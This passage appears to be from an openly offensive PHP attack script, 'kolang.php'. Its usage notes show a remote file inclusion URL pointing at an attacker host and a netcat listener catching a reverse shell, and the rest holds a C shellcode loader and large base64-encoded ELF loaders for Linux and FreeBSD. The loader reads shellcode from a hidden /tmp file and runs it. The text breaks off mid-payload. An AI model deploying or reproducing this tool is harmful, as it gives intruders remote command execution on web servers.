)\r\n\r\n~~~~ How to use:)\r\n\r\nfor linux:\r\n\tkolang.php?os=linux&host=LHOST&port=LPORT\r\n\tor \r\n\tkolang.php?os=linux&shell=BASE64_ENCODED_SHELLCODE\r\n\r\nfor freebsd:\r\n\tkolang.php?os=freebsd&shell=BASE64_ENCODED_SHELLCODE\r\n\r\nfile inclusion :\r\n\thttp://host/vul.php?path=http://attacker/kolang.txt?&os=linux&host=LHOST&port=LPORT\r\n\r\n\r\nhttp://localhost/kolang.php?host=localhost&port=2121\r\nhamid@bugtraq ~ $ nc -vv -l -p 2121\r\nlistening on [any] 2121 ...\r\nconnect to [127.0.0.1] from bugtraq [127.0.0.1] 40526\r\nid\r\nuid=65534(nobody) gid=65533(nogroup) groups=65533(nogroup)\r\n\r\n\r\nHamid Ebadi\r\nhttp://www.bugtraq.ir\r\ncontact : ebadi~bugtraq~ir\r\n\r\nKolang means pickaxe (the idea came from amnafzar naming convention)\r\n(Separ, Sarand, Alak, Skort)\r\n*/\r\n\r\n\r\n$port= intval($_REQUEST['port']);\r\n$host= $_REQUEST['host'];\r\n$os= $_REQUEST['os'];\r\n\r\n/*\r\n\r\n\r\n//compile : cc -o shellcode.so -fPIC -shared shellcode.c\r\n//\r\n//<?php\r\n//$data=file_get_contents('shellcode.so');\r\n//file_put_contents('shellcode_base64.txt',$data);\r\n//?>\r\n\r\n\r\n\r\n\r\n// \"shellcode loader\" : load and execute arbitrary shellcode from a file\r\n// Hamid Ebadi\r\n#define O_RDONLY 00 ; fcntl.h\r\n#define SHELLCODE_MAX_SIZE 1024\r\n// change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'\r\n#define SHELLCODE_FILENAME \"/tmp/.X11-IHSTEAM\"\r\n\r\nvoid getuid()\r\n{\r\n\tunsetenv(\"LD_PRELOAD\"); //not really necessary, we can remove it\r\n\tint fd;\r\n\tchar shellcode[SHELLCODE_MAX_SIZE];\r\n\tchar filename[]=SHELLCODE_FILENAME ;\r\n\t// we can also pass the shellcode in program's arguments\r\n\tif ((fd = open(SHELLCODE_FILENAME,O_RDONLY)) < 0) {\r\n\texit(1);\r\n\t}\r\n\tif (read(fd,shellcode,SHELLCODE_MAX_SIZE) < 0){\r\n\texit(1);\r\n\t}\r\n\t(*(void(*)()) shellcode)();\r\n}\r\n\r\n*/\r\n\r\nif ($_REQUEST['os']=='freebsd'){\r\n// freebsd shellcode loader (x86)\r\n$shellcode_loader=\r\n\"f0VMRgEBAQkAAAAAAAAAAAMAAwABAAAAeAUAADQAAADsCQAAAAAAADQAIAADACgAFwAUAAEAAAAA\r\nAAAAAAAAAAAAAADhBwAA4QcAAAUAAAAAEAAAAQAAAOQHAADkFwAA5BcAAPwAAAAYAQAABgAAAAAQ\r\nAAACAAAA8AcAAPAXAADwFwAAoAAAAKAAAAAGAAAABAAAABEAAAAkAAAAAAAAAB0AAAAeAAAAIgAA\r\nABUAAAAAAAAAAAAAABoAAAAcAAAAIwAAACEAAAAbAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXAAAAFAAAABYA\r\nAAAZAAAAAAAAAB8AAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJQAAAAAAAAAAwAB\r\nAAAAAABwAQAAAAAAAAMAAgAAAAAAsAMAAAAAAAADAAMAAAAAAGQEAAAAAAAAAwAEAAAAAACUBAAA\r\nAAAAAAMABQAAAAAA1AQAAAAAAAADAAYAAAAAAOgEAAAAAAAAAwAHAAAAAAB4BQAAAAAAAAMACAAA\r\nAAAAJAcAAAAAAAADAAkAAAAAADAHAAAAAAAAAwAKAAAAAADkFwAAAAAAAAMACwAAAAAA7BcAAAAA\r\nAAADAAwAAAAAAPAXAAAAAAAAAwANAAAAAACQGAAAAAAAAAMADgAAAAAAmBgAAAAAAAADAA8AAAAA\r\nAKAYAAAAAAAAAwAQAAAAAACkGAAAAAAAAAMAEQAAAAAA4BgAAAAAAAADABIAAAAAAAAAAAAAAAAA\r\nAwATAIQAAAAAAAAAAAAAABAAAAABAAAA8BcAAAAAAAARAPH/LAAAAAAAAAAAAAAAIAAAAH0AAABU\r\nBgAAnQAAABIACAAgAAAA1AQAAAAAAAASAAYAOwAAAAAAAAAAAAAAIAAAAJcAAAAAAAAAAAAAABAA\r\nAACjAAAA4BgAAAAAAAAQAPH/JgAAACQHAAAAAAAAEgAJAJwAAADgGAAAAAAAABAA8f8KAAAApBgA\r\nAAAAAAARAPH/rwAAAPwYAAAAAAAAEADx/5IAAAAAAAAAAAAAABAAAACNAAAAAAAAAAAAAAAQAAAA\r\naQAAAAAAAAAAAAAAIAAAAFMAAAAAAAAAAAAAACAAAAAAX0RZTkFNSUMAX0dMT0JBTF9PRkZTRVRf\r\nVEFCTEVfAF9pbml0AF9maW5pAF9fY3hhX2ZpbmFsaXplAF9fZGVyZWdpc3Rlcl9mcmFtZV9pbmZv\r\nAF9fcmVnaXN0ZXJfZnJhbWVfaW5mbwBfSnZfUmVnaXN0ZXJDbGFzc2VzAGdldHVpZAB1bnNldGVu\r\ndgBvcGVuAGV4aXQAcmVhZABfZWRhdGEAX19ic3Nfc3RhcnQAX2VuZADkFwAACAAAAOgXAAAIAAAA\r\n0BgAAAYWAADUGAAABhkAANgYAAAGIgAA3BgAAAYjAACwGAAABxQAALQYAAAHFgAAuBgAAAcZAAC8\r\nGAAABxoAAMAYAAAHIAAAxBgAAAchAADIGAAAByIAAMwYAAAHIwAAg+wM6BQBAADoEwIAAIPEDMMA\r\nAAD/swQAAAD/owgAAAAAAAAA/6MMAAAAaAAAAADp4P////+jEAAAAGgIAAAA6dD/////oxQAAABo\r\nEAAAAOnA/////6MYAAAAaBgAAADpsP////+jHAAAAGggAAAA6aD/////oyAAAABoKAAAAOmQ////\r\n/6MkAAAAaDAAAADpgP////+jKAAAAGg4AAAA6XD///9VieVT6AAAAABbgcMjEwAAUYC7PAAAAAB1\r\nWIuTLAAAAIXSdB+D7Az/s0D////oXv///4PEEOsMkIPABImDRP/////Si4NE////ixCF0nXpi4Mw\r\nAAAAhcB0EoPsDI2DSP///1DoOP///4PEEMaDPAAAAAGLXfzJw5BVieVT6AAAAABbgcOrEgAAUIuD\r\nOAAAAIXAdBmD7AiNg0AAAABQjYNI////UOhH////g8QQi4P8////hcB0HouDNAAAAIXAdBSD7AyN\r\ng/z///9Q6BH///+DxBCJ9otd/MnDkJCQVYnlV1ZTgew8BAAA6AAAAABbgcM/EgAAg+wMjYPW7v//\r\nUOh9/v//g8QQjb24+///jbPh7v///LkSAAAA86SD7AhqAI2D4e7//1Dopf7//4PEEIlF5IN95AB5\r\nCoPsDGoB6H/+//+D7ARoAAQAAI2F2Pv//1D/deToWP7//4PEEIXAeQqD7AxqAehX/v//jYXY+///\r\n/9CNZfRbXl/Jw5CQkFWJ5VZT6AAAAABbgcOmEQAAjYPw////jXD8i0D86wiQg+4E/9CLBoP4/3X0\r\nW17Jw4PsDOhM/v//g8QMwyRGcmVlQlNEOiBzcmMvbGliL2NzdS9pMzg2LWVsZi9jcnRpLlMsdiAx\r\nLjcgMjAwNS8wNS8xOSAwNzozMTowNiBkZnIgRXhwICQATERfUFJFTE9BRAAvdG1wLy5YMTEtSUhT\r\nVEVBTQAkRnJlZUJTRDogc3JjL2xpYi9jc3UvaTM4Ni1lbGYvY3J0bi5TLHYgMS42IDIwMDUvMDUv\r\nMTkgMDc6MzE6MDYgZGZyIEV4cCAkAAAAAOQXAACcGAAAAAAAAAwAAADUBAAADQAAACQHAAAEAAAA\r\nlAAAAAUAAACwAwAABgAAAHABAAAKAAAAtAAAAAsAAAAQAAAAAwAAAKQYAAACAAAAQAAAABQAAAAR\r\nAAAAFwAAAJQEAAARAAAAZAQAABIAAAAwAAAAEwAAAAgAAAD6//9vAgAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////AAAAAP////8AAAAAAAAAAPAXAAAAAAAAAAAA\r\nAP4EAAAOBQAAHgUAAC4FAAA+BQAATgUAAF4FAABuBQAAAAAAAAAAAAAAAAAAAAAAAABHQ0M6IChH\r\nTlUpIDMuNC42IFtGcmVlQlNEXSAyMDA2MDMwNQAAR0NDOiAoR05VKSAzLjQuNiBbRnJlZUJTRF0g\r\nMjAwNjAzMDUAAEdDQzogKEdOVSkgMy40LjYgW0ZyZWVCU0RdIDIwMDYwMzA1AAAuc3ltdGFiAC5z\r\ndHJ0YWIALnNoc3RydGFiAC5oYXNoAC5keW5zeW0ALmR5bnN0cgAucmVsLmR5bgAucmVsLnBsdAAu\r\naW5pdAAudGV4dAAuZmluaQAucm9kYXRhAC5kYXRhAC5laF9mcmFtZQAuZHluYW1pYwAuY3RvcnMA\r\nLmR0b3JzAC5qY3IALmdvdAAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAGwAAAAUAAAACAAAAlAAAAJQAAADcAAAAAgAAAAAAAAAEAAAABAAAACEA\r\nAAALAAAAAgAAAHABAABwAQAAQAIAAAMAAAAUAAAABAAAABAAAAApAAAAAwAAAAIAAACwAwAAsAMA\r\nALQAAAAAAAAAAAAAAAEAAAAAAAAAMQAAAAkAAAACAAAAZAQAAGQEAAAwAAAAAgAAAAAAAAAEAAAA\r\nCAAAADoAAAAJAAAAAgAAAJQEAACUBAAAQAAAAAIAAAAHAAAABAAAAAgAAABDAAAAAQAAAAYAAADU\r\nBAAA1AQAABEAAAAAAAAAAAAAAAQAAAAAAAAAPgAAAAEAAAAGAAAA6AQAAOgEAACQAAAAAAAAAAAA\r\nAAAEAAAABAAAAEkAAAABAAAABgAAAHgFAAB4BQAArAEAAAAAAAAAAAAABAAAAAAAAABPAAAAAQAA\r\nAAYAAAAkBwAAJAcAAAwAAAAAAAAAAAAAAAQAAAAAAAAAVQAAAAEAAAACAAAAMAcAADAHAACxAAAA\r\nAAAAAAAAAAABAAAAAAAAAF0AAAABAAAAAwAAAOQXAADkBwAACAAAAAAAAAAAAAAABAAAAAAAAABj\r\nAAAAAQAAAAIAAADsFwAA7AcAAAQAAAAAAAAAAAAAAAQAAAAAAAAAbQAAAAYAAAADAAAA8BcAAPAH\r\nAACgAAAAAwAAAAAAAAAEAAAACAAAAHYAAAABAAAAAwAAAJAYAACQCAAACAAAAAAAAAAAAAAABAAA\r\nAAAAAAB9AAAAAQAAAAMAAACYGAAAmAgAAAgAAAAAAAAAAAAAAAQAAAAAAAAAhAAAAAEAAAADAAAA\r\noBgAAKAIAAAEAAAAAAAAAAAAAAAEAAAAAAAAAIkAAAABAAAAAwAAAKQYAACkCAAAPAAAAAAAAAAA\r\nAAAABAAAAAQAAACOAAAACAAAAAMAAADgGAAA4AgAABwAAAAAAAAAAAAAAAQAAAAAAAAAkwAAAAEA\r\nAAAAAAAAAAAAAOAIAABvAAAAAAAAAAAAAAABAAAAAAAAABEAAAADAAAAAAAAAAAAAABPCQAAnAAA\r\nAAAAAAAAAAAAAQAAAAAAAAABAAAAAgAAAAAAAAAAAAAAhA0AABAEAAAWAAAAMQAAAAQAAAAQAAAA\r\nCQAAAAMAAAAAAAAAAAAAAJQRAAD1AQAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAlAAAAAAAAAADAAEAAAAAAHABAAAAAAAAAwACAAAAAACwAwAAAAAAAAMAAwAAAAAAZAQAAAAA\r\nAAADAAQAAAAAAJQEAAAAAAAAAwAFAAAAAADUBAAAAAAAAAMABgAAAAAA6AQAAAAAAAADAAcAAAAA\r\nAHgFAAAAAAAAAwAIAAAAAAAkBwAAAAAAAAMACQAAAAAAMAcAAAAAAAADAAoAAAAAAOQXAAAAAAAA\r\nAwALAAAAAADsFwAAAAAAAAMADAAAAAAA8BcAAAAAAAADAA0AAAAAAJAYAAAAAAAAAwAOAAAAAACY\r\nGAAAAAAAAAMADwAAAAAAoBgAAAAAAAADABAAAAAAAKQYAAAAAAAAAwARAAAAAADgGAAAAAAAAAMA\r\nEgAAAAAAAAAAAAAAAAADABMAAAAAAAAAAAAAAAAAAwAUAAAAAAAAAAAAAAAAAAMAFQAAAAAAAAAA\r\nAAAAAAADABYAAQAAAAAAAAAAAAAABADx/yIAAAAAAAAAAAAAAAQA8f8xAAAAAAAAAAAAAAAEAPH/\r\nAQAAAAAAAAAAAAAABADx/zwAAAAAAAAAAAAAAAQA8f9HAAAAkBgAAAAAAAABAA4AVQAAAJgYAAAA\r\nAAAAAQAPAGMAAADsFwAAAAAAAAEADAB2AAAAoBgAAAAAAAABABAAgwAAAOgXAAAAAAAAAQALAIcA\r\nAADgGAAAAQAAAAEAEgCTAAAAeAUAAAAAAAACAAgAqQAAAOQYAAAYAAAAAQASALIAAADwBQAAAAAA\r\nAAIACAA8AAAAAAAAAAAAAAAEAPH/vgAAAJQYAAAAAAAAAQAOAMsAAACcGAAAAAAAAAEADwDYAAAA\r\n7BcAAAAAAAABAAwA5gAAAKAYAAAAAAAAAQAQAPIAAAD0BgAAAAAAAAIACAAIAQAAAAAAAAAAAAAE\r\nAPH/IgAAAAAAAAAAAAAABADx/zEAAAAAAAAAAAAAAAQA8f8IAQAAAAAAAAAAAAAEAPH/KQEAAAAA\r\nAAAAAAAABADx/zUBAADkFwAAAAAAAAECCwBCAQAAAAAAAAAAAAAQAAAASwEAAPAXAAAAAAAAEQDx\r\n/1QBAAAAAAAAAAAAACAAAABjAQAAVAYAAJ0AAAASAAgAagEAANQEAAAAAAAAEgAGAHABAAAAAAAA\r\nAAAAACAAAACIAQAAAAAAAAAAAAAQAAAAjQEAAOAYAAAAAAAAEADx/5kBAAAkBwAAAAAAABIACQCf\r\nAQAA4BgAAAAAAAAQAPH/pgEAAKQYAAAAAAAAEQDx/7wBAAD8GAAAAAAAABAA8f/BAQAAAAAAAAAA\r\nAAAQAAAAxgEAAAAAAAAAAAAAEAAAAMsBAAAAAAAAAAAAACAAAADfAQAAAAAAAAAAAAAgAAAAAC91\r\nc3Ivc3JjL2xpYi9jc3UvaTM4Ni1lbGYvY3J0aS5TADxjb21tYW5kIGxpbmU+ADxidWlsdC1pbj4A\r\nY3J0c3R1ZmYuYwBfX0NUT1JfTElTVF9fAF9fRFRPUl9MSVNUX18AX19FSF9GUkFNRV9CRUdJTl9f\r\nAF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4AG9iamVj\r\ndC4yAGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBf\r\nX0pDUl9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAL3Vzci9zcmMvbGliL2NzdS9pMzg2LWVs\r\nZi9jcnRuLlMAc2hlbGxjb2RlLmMAX19kc29faGFuZGxlAHVuc2V0ZW52AF9EWU5BTUlDAF9fY3hh\r\nX2ZpbmFsaXplAGdldHVpZABfaW5pdABfX2RlcmVnaXN0ZXJfZnJhbWVfaW5mbwByZWFkAF9fYnNz\r\nX3N0YXJ0AF9maW5pAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABleGl0AG9wZW4A\r\nX0p2X1JlZ2lzdGVyQ2xhc3NlcwBfX3JlZ2lzdGVyX2ZyYW1lX2luZm8A\";\r\n}else{\r\n// default: linux\r\n// linux shellcode loader (x86)\r\n$shellcode_loader=\r\n\"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\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/////wAAAAD/////AAAAAAAAAAABAAAA\r\nXgAAAAwAAACQAwAADQAAAAgGAAAEAAAA9AAAAPX+/29AAQAABQAAAFwCAAAGAAAAfAEAAAoAAACW\r\nAAAACwAAABAAAAADAAAA9B8AAAIAAAAwAAAAFAAAABEAAAAXAAAAYAMAABEAAABAAwAAEgAAACAA\r\nAAATAAAACAAAAP7//28QAwAA////bwEAAADw//9v8gIAAPr//28BAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAfAAAAAAAAAAAAAL4DAADOAwAA\r\n3gMAAO4DAAD+AwAADgQAABggAAAAR0NDOiAoR2VudG9vIDQuMy4xLXIxIHAxLjEpIDQuMy4xAABH\r\nQ0M6IChHZW50b28gNC4zLjIgcDEuMSkgNC4zLjIAAEdDQzogKEdlbnRvbyA0LjMuMiBwMS4xKSA0\r\nLjMuMgAAR0NDOiAoR2VudG9vIDQuMy4yIHAxLjEpIDQuMy4yAABHQ0M6IChHZW50b28gNC4zLjEt\r\ncjEgcDEuMSkgNC4zLjEAAC5zeW10YWIALnN0cnRhYgAuc2hzdHJ0YWIALmdudS5oYXNoAC5keW5z\r\neW0ALmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbC5keW4ALnJlbC5wbHQA\r\nLmluaXQALnRleHQALmZpbmkALnJvZGF0YQAuZWhfZnJhbWUALmN0b3JzAC5kdG9ycwAuamNyAC5k\r\neW5hbWljAC5nb3QALmdvdC5wbHQALmRhdGEALmJzcwAuY29tbWVudAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8AAAAFAAAAAgAAAPQAAAD0AAAATAAAAAMAAAAAAAAA\r\nBAAAAAQAAAAbAAAA9v//bwIAAABAAQAAQAEAADwAAAADAAAAAAAAAAQAAAAEAAAAJQAAAAsAAAAC\r\nAAAAfAEAAHwBAADgAAAABAAAAAEAAAAEAAAAEAAAAC0AAAADAAAAAgAAAFwCAABcAgAAlgAAAAAA\r\nAAAAAAAAAQAAAAAAAAA1AAAA////bwIAAADyAgAA8gIAABwAAAADAAAAAAAAAAIAAAACAAAAQgAA\r\nAP7//28CAAAAEAMAABADAAAwAAAABAAAAAEAAAAEAAAAAAAAAFEAAAAJAAAAAgAAAEADAABAAwAA\r\nIAAAAAMAAAAAAAAABAAAAAgAAABaAAAACQAAAAIAAABgAwAAYAMAADAAAAADAAAACgAAAAQAAAAI\r\nAAAAYwAAAAEAAAAGAAAAkAMAAJADAAAXAAAAAAAAAAAAAAAEAAAAAAAAAF4AAAABAAAABgAAAKgD\r\nAACoAwAAcAAAAAAAAAAAAAAABAAAAAQAAABpAAAAAQAAAAYAAAAgBAAAIAQAAOgBAAAAAAAAAAAA\r\nABAAAAAAAAAAbwAAAAEAAAAGAAAACAYAAAgGAAAcAAAAAAAAAAAAAAAEAAAAAAAAAHUAAAABAAAA\r\nAgAAACQGAAAkBgAAHQAAAAAAAAAAAAAAAQAAAAAAAAB9AAAAAQAAAAIAAABEBgAARAYAAAQAAAAA\r\nAAAAAAAAAAQAAAAAAAAAhwAAAAEAAAADAAAADB8AAAwPAAAIAAAAAAAAAAAAAAAEAAAAAAAAAI4A\r\nAAABAAAAAwAAABQfAAAUDwAACAAAAAAAAAAAAAAABAAAAAAAAACVAAAAAQAAAAMAAAAcHwAAHA8A\r\nAAQAAAAAAAAAAAAAAAQAAAAAAAAAmg